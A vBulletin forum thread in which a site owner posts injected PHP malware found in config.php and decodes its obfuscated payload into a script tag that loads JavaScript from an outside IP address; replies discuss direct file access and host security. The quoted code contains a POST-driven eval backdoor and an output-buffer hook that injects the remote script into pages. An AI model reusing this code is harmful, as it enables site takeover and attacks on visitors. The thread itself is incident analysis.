Announcement

Collapse
No announcement yet.

Site was hacked this morning - trying to figure out how they did it

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Site was hacked this morning - trying to figure out how they did it

    I woke up this morning to find that all the pages on one of my larger sites were white. I immediately thought it was a cache problem, but after restarting things, nothing worked.

    I looked a little further and found that config.php suddenly had this code inserted into the end of it:
    (originally it was a block of code, but I cleaned it up to read it)
    PHP Code:
    <?php
      
    if (!function_exists('tmp_lkojfghx')) {
          for (
    $i 1$i 10$i++)
              if (
    is_file($f '/tmp/m' $i)) {
                  include_once(
    $f);
                  break;
              }
          if (isset(
    $_POST['tmp_lkojfghx3']))
              eval(
    $_POST['tmp_lkojfghx3']);
          if (!
    defined('TMP_XHGFJOKL'))
              
    define('TMP_XHGFJOKL'base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
          function 
    tmp_lkojfghx($s)
          {
              if (
    $g = (bin2hex(substr($s02)) == '1f8b'))
                  
    $s gzinflate(substr($s10, -8));
              if (
    preg_match_all('#<script(.*?)</script>#is'$s$a))
                  foreach (
    $a[0] as $v)
                      if (
    count(explode("\n"$v)) > 5) {
                          
    $e preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#'$v) || preg_match('#[\(\[](\s*\d+,){20,}#'$v);
                          if ((
    preg_match('#\beval\b#'$v) && ($e || strpos($v'fromCharCode'))) || ($e && strpos($v'document.write')))
                              
    $s str_replace($v''$s);
                      }
              
    $s1 preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#'''$s);
              if (
    stristr($s'<body'))
                  
    $s preg_replace('#(\s*<body)#mi'TMP_XHGFJOKL '\1'$s1);
              elseif ((
    $s1 != $s) || stristr($s'</body') || stristr($s'</title>'))
                  
    $s $s1 TMP_XHGFJOKL;
              return 
    $g gzencode($s) : $s;
          }
          function 
    tmp_lkojfghx2($a 0$b 0$c 0$d 0)
          {
              
    $s = array();
              if (
    $b && $GLOBALS['tmp_xhgfjokl'])
                  
    call_user_func($GLOBALS['tmp_xhgfjokl'], $a$b$c$d);
              foreach (@
    ob_get_status(1) as $v)
                  if ((
    $a $v['name']) == 'tmp_lkojfghx')
                      return;
                  else
                      
    $s[] = array($a == 'default output handler' false $a);
              for (
    $i count($s) - 1$i >= 0$i--) {
                  
    $s[$i][1] = ob_get_contents();
                  
    ob_end_clean();
              }
              
    ob_start('tmp_lkojfghx');
              for (
    $i 0$i count($s); $i++) {
                  
    ob_start($s[$i][0]);
                  echo 
    $s[$i][1];
              }
          }
      }
      if ((
    $a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
          
    $GLOBALS['tmp_xhgfjokl'] = $a;
      
    tmp_lkojfghx2();
    ?>
    After searching around some more, I realized that almost every php file had this code inserted. None of the file dates had changed.

    I restored a backup and now everything is fine - but I'm trying to figure out HOW they did this and what the PURPOSE was.

    There's a line in the code there 'base64_decode'. ah, a clue. That line decodes to this:
    Code:
    <script language=javascript><!-- 
    document.write(unescape('rc6%3Cekbs2wcriIip2wt%20s0S0rc%3D%2F%2F7HXz8%2E0S012w10HXz%2Erc61rN7HXz5Du%2ErN24ekb9%2F2wjrc6qIiuerekbyekb%2Erc6jrc6s%3E0S0%3C2w%2Fsc0S0rHXzipekbt%3E').replace(/rc6|0S0|Ii|Du|ekb|rN|2w|HXz/g,""));
     --></script>
    Escaped characters result in this:

    Code:
    rc6<ekbs2wcriIip2wt s0S0rc=//7HXz8.0S012w10HXz.rc61rN7HXz5Du.rN24ekb9/2wjrc6qIiuerekbyekb.rc6jrc6s>0S0<2w/sc0S0rHXzipekbt>
    After replacing characters:
    Code:
    <script src=//78.110.175.249/jquery.js></script>
    That file contains a js library that starts out as this:
    Code:
    /*
     * jQuery JavaScript Library v1.3.1
     * http://jquery.com/
     *
     * Copyright (c) 2009 John Resig
     * Dual licensed under the MIT and GPL licenses.
     * http://docs.jquery.com/License
     *
     * Date: 2009-01-21 20:42:16 -0500 (Wed, 21 Jan 2009)
     * Revision: 6158
     */

    Anyone have any idea how they did this and what was trying to be done?

    I'm running 3.7.4 pl1

    Capture more registrations - Advanced Guest Posting & Registration
    Cell Phone Forums | Nikonites

  • #2
    The only way they could have done this is with direct access to your files on the server. You should contact your host immediately.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment


    • #3
      And change ur password pretty fast.
      Jut a random internet person.

      A message to all illegal users!

      Comment


      • #4
        jQuery isn't something bad. I guess it was just used to do you (your website) harm.

        I'm wondering why they decoded (or encoded whichever is the bad one) the source of the file.

        The server (I analysed the IP with online tools) is based in the UK but run by a russian company if I'm correct.
        That's the end of that!

        Comment


        • #5
          Could you possibly let us know which hosting provider you have?

          Comment


          • #6
            The 'encoding' was to hide the IP address and what was trying to be executed. I figured out that jquery is just a library. I still don't know what they were trying to do though.

            Capture more registrations - Advanced Guest Posting & Registration
            Cell Phone Forums | Nikonites

            Comment


            • #7
              Originally posted by dkon26 View Post
              Could you possibly let us know which hosting provider you have?
              Why does that matter? I run two dedicated servers though. CSF was running at the time of the break in and the application server is locked down pretty good.

              Capture more registrations - Advanced Guest Posting & Registration
              Cell Phone Forums | Nikonites

              Comment


              • #8
                Originally posted by tpearl5 View Post
                Why does that matter? I run two dedicated servers though. CSF was running at the time of the break in and the application server is locked down pretty good.
                Simply because it would be nice to know if anyone else could be at risk for a direct hit. If they changed your config file, as steve said, its direct file access. I am only asking because I manage over 100 dedicated servers for clients using several providers and it would be good to know if there is a security issue that needs to be addressed.

                Comment


                • #9
                  Originally posted by dkon26 View Post
                  Simply because it would be nice to know if anyone else could be at risk for a direct hit. If they changed your config file, as steve said, its direct file access. I am only asking because I manage over 100 dedicated servers for clients using several providers and it would be good to know if there is a security issue that needs to be addressed.
                  exactly. I thought it was a very reasonable question.

                  Comment


                  • #10
                    Okay, I understand. I wasn't thinking in terms of shared hosting. Thanks

                    Capture more registrations - Advanced Guest Posting & Registration
                    Cell Phone Forums | Nikonites

                    Comment


                    • #11
                      I think the security side of the host plays an important role.

                      Comment


                      • #12
                        Originally posted by tpearl5 View Post
                        Okay, I understand. I wasn't thinking in terms of shared hosting. Thanks
                        People want to know because they may also be exposed to security problems. It would be a courtesy to let us know. Based on a cursory search of your domains traceroute, I'm seeing ThePlanet.com as your host. But they also rent space in their data centers to other hosts. Can you please fill us in?

                        Jim
                        If my post was helpful to you, please take the time to register at my forum and ask a question you've always wanted to know about floors.
                        www.TheFloorPro.com

                        Comment


                        • #13
                          Originally posted by eJM View Post
                          People want to know because they may also be exposed to security problems. It would be a courtesy to let us know. Based on a cursory search of your domains traceroute, I'm seeing ThePlanet.com as your host. But they also rent space in their data centers to other hosts. Can you please fill us in?

                          Jim
                          Yes, my servers are rented with theplanet. I manage them.

                          Capture more registrations - Advanced Guest Posting & Registration
                          Cell Phone Forums | Nikonites

                          Comment


                          • #14
                            Is everything on your servers up to date with all appropriate patches?
                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment


                            • #15
                              Apache is slightly off at version 2.2.6 - php 5.2.5. Everything else is up to date.

                              Capture more registrations - Advanced Guest Posting & Registration
                              Cell Phone Forums | Nikonites

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X